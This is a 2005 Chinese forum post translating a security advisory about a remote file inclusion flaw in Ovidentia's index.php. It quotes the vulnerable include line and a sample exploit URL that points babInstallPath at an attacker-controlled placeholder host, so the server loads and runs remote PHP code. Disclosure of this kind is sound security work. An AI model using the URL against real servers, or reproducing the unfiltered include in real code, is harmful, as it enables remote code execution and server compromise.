‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[翻译]Ovidentia'index.php' 包含文件存在漏洞,遥远用户运行任意指

hak_ban[HSG]

晶莹剔透§烈日灼然

Rank: 1

E.S.T论坛贵宾

帖子
137 
精华
4 
积分
3301 
阅读权限
60 
性别
男 
在线时间
0 小时 
注册时间
2004-10-21 
最后登录
2005-7-29 
楼主 发表于 2005-6-11 09:54  只看该作者

[翻译]Ovidentia'index.php' 包含文件存在漏洞,遥远用户运行任意指

资料翻译: fpx[BCT]
翻译网站:  Bug.Center.Team http://www.cnbct.org
SecurityTracker ID:  1014149
SecurityTracker URL:  http:// securitytracker.com/id?1014149
CVE 叁考:  GENERIC-MAP-NOMATCH
厂商网址:  www.ovidentia.org
日期:    2005 年6月 9 日
影响:    使用者经由网络执行任意代码

摘要: Status-x 报告了 Ovidentia 的一个漏洞。
遥远能在目标系统上运行任意指令。 'index.php'
脚本包含的'utilit/utilit.php' 脚本文件中的
'babInstallPath' 叁数过滤不严。遥远用户能提
交特殊构造的URL在目标系统运行任意PHP代码,
包括操作系统指令, 得到服务器权限。

漏洞代码:

$babSiteName = substr($babSiteName, 0, 30);
include_once "base.php";
include $babInstallPath."utilit/utilit.php"; <--- vuln
unset($BAB_SESS_LOGGED);

$babPhpSelf = substr($PHP_SELF,-strpos(strrev($PHP_SELF),&#39;/&#39;));
$babUrlScript = $babUrl.$babPhpSelf;
$babAddonsPath = $GLOBALS[&#39;babInstallPath&#39;]."addons/";


漏洞利用示范:

http://[target]/ovidentia/index.php?babInstallPath=http://[attacker]
白痴狗将会离我们而去, 需要怀念白痴狗的朋友, 请发消息给白痴狗的QQ (PS:白痴狗QQ会永远在网上开着)

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题